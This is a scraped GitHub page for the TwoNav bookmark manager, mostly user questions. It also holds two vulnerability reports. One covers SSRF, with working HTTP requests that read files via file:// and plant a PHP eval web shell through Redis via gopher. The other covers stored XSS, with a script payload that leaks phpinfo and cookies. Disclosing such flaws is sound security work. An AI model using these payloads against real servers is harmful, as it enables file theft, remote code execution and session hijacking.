tznb1 / twonav Goto Github PK
View Code? Open in Web Editor NEWTwoNav 第二代云导航|云书签管理系统
Home Page: https://two.lm21.top
License: GNU General Public License v3.0
twonav's People
Stargazers
Watchers
Forkers
laputaer passerbymoi wolfling45 ifoxox cxpkxp protonuniverse workwefsdf amiking zhaojianzhong23 codesensi lizhongnian siinxu vjingbi kkeenee kpzy liubin882 ldd166 xbc001 goodmen001 wwwyft kunjun geekfusion xiaohua63 weijiaxing zkjiaaa mke090 chillgis yinyangfs enjoyzone damonwei1120 xoyu-blog ldj888 1234-star laozi01 2733284198 kie619 6mmshare ying-c hopolcn nohtm fannycheung qazwsx12345621 miboyule zhengwenxiao weiyi88 yuping19870203 cnhunke kevchen16 guyefei mebaddy wsadczh reflander fydlai2 yixinshuwutwonav's Issues
SSRF Vulnerability in TwoNav v2.1.13-20240321
Vulnerability Product: TwoNav v2.1.13-20240321
Vulnerability version: v2.1.13-20240321
Vulnerability type: SSRF
Vulnerability location: system\api.php
When using the TwoNav, I discovered a SSRF vulnerability in the '站长工具'->'连通测试'
I can use this vulnerability to detect internal network information or more
Given the following snippet:
function read_data(){
global $USER_DB;
//指定类型限制仅root账号可用!
if($USER_DB['UserGroup'] != 'root' && in_array( $_GET['type'],['diagnostic_log','connectivity_test','phpinfo'])){
msg(-1,'无权限');
}
//概要数据统计
if($_GET['type'] == 'home'){
$category_count = count_db('user_categorys',['uid'=>UID])??0;
$link_count = count_db('user_links',['uid'=>UID])??0;
$index_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'index_Ym'])??0;
$click_count = get_db('user_count','v',['uid'=>UID,'k'=>date('Ym'),'t'=>'click_Ym'])??0;
msgA( ['code'=>1,'data'=>[$category_count,$link_count,$index_count,$click_count] ]);
//连通测试
}elseif($_GET['type'] == 'connectivity_test'){
if($GLOBALS['global_config']['offline'] == '1'){
msg(1,'您已开启离线模式,无法使用该功能!');
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['url']);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$start = microtime(true);
$response = curl_exec($ch);
$end = microtime(true);
$time = round(($end - $start) * 1000, 2);
if(curl_errno($ch)) {
$log .= "请求发生错误:".curl_error($ch);
} else {
$log .= "响应内容:".$response ?? 'Null' ;
$log .= ",访问耗时:{$time} 毫秒。" ;
}
curl_close($ch);
msg(1,$log);
Firstly, log in to the backend as an administrator.
Visit http://localhost/index.php?c=admin&u=admin#root/tool.
Click on '站长工具'->'连通测试', use Burp Suite to capture packets, and modify the packet data.
Through testing, I have discovered various exploits including but not limited to:
Read any file through the file protocol
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 19
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: TwoNavSID=mjehh1692q6k2m13345op8ljr5; admin_key=2da422eacc04d523b4732337fc682a70
Connection: close
url=file:///D:/flag
Detecting ports through the dict protocol
Write a shell through the gopher protocol(if the server has Redis installed).
POST /TwoNav/index.php?c=api&method=read_data&type=connectivity_test&u=admin HTTP/1.1
Host: 192.168.31.184
Content-Length: 662
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.184
Referer: http://192.168.31.184/TwoNav/?c=admin&page=root/tool&u=admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: db_type=mysql; TwoNav_initial=83r8q51c605fflp84i1ibsb6qi; admin_key=66495a9c3f40439d250286a81f4aa1dc; TwoNavSID=o8ckle5vgsfhuu4l2gq0so8e11
Connection: close
url=gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2527xxx%2527%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252427%250D%250AD%253A%255Cenv%255Cphp%255Cphpstudy_pro%255CWWW%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A=
兼容OneNav的数据吗,或者有没有简单的方法把OneNav的数据导过来
RT
安装引导页面提示保存配置失败
腾讯云服务器 mysql5.7,网页能打开,但安装不了,提示“保存配置失败”
[Warning] Stored XSS in TwoNav v2.0.28-20230624
Vulnerability Product:TwoNav v2.0.28-20230624
Vulnerability version: v2.0.28-20230624
Vulnerability type: Stored XSS
Vulnerability Details:
Vulnerability location:add header 、"/index.php?c=api&method=read_data&type=phpinfo&u=admin"
The default settings allowing free register, causes stored XSS
the Stored XSS payload could let admin call phpinfo(); and bypassing the http-only , causes disclosure of cookies、root path of websites、variables of PHP and stuff
firstly , register an account at http://localhost/?c=login,
account : test
password : test
then go to "站点设置",
because of the http-only, you need to let admin call phpinfo(), the api is this : http://localhost/index.php?c=api&method=read_data&type=phpinfo&u=admin
enter the payload at the input of "头部(header)代码 - 用户", :
payload:
<script src="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type="text/javascript"></script>
<script>
$.ajax({
url: '/index.php?c=api&method=read_data&type=phpinfo&u=admin',
type: 'get',
success: function (data) {
console.log(data);
}
})
</script>and click "保存"
after it , when an admin enter the page "http://localhost/?u=test", the page will automatically get phpinfo and call console.log() print it
(Certainly you can update the payload to send phpinfo to your server, console log is a test)
finally ,we download phpinfo and open it in html ,
here is large number of cookies was disclosed, and root path of website
proved Stored XSS
discovered by leeya_bug
使用webstack-hugo主题是必须授权后才能使用?
使用webstack-hugo主题是必须授权后才能使用?
开始安装呢,之前必须有数据库吗?
比如我用db 3的数据库是必须得有db 3这个原始的,这个文件在这才能安装吗?还是安装的时候会自动生成?
你好,请问下是否支持英文版本呢
因为有做英文站的需求,所以请问下后台设置中是否有修改成英文界面的选项呢。
我在后台查找了一番,并没有找到修改成英文界面的选项。
能否适配功耗更小的armv7/arm64设备?
如题,arm设备功耗比x86设备小很多,更适合长期挂载这类导航程序。
arm设备 50元/个,5w/h
x86设备 200起步,50w/h
你好,不是说支持浏览器扩展吗?下载地址在哪呢
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.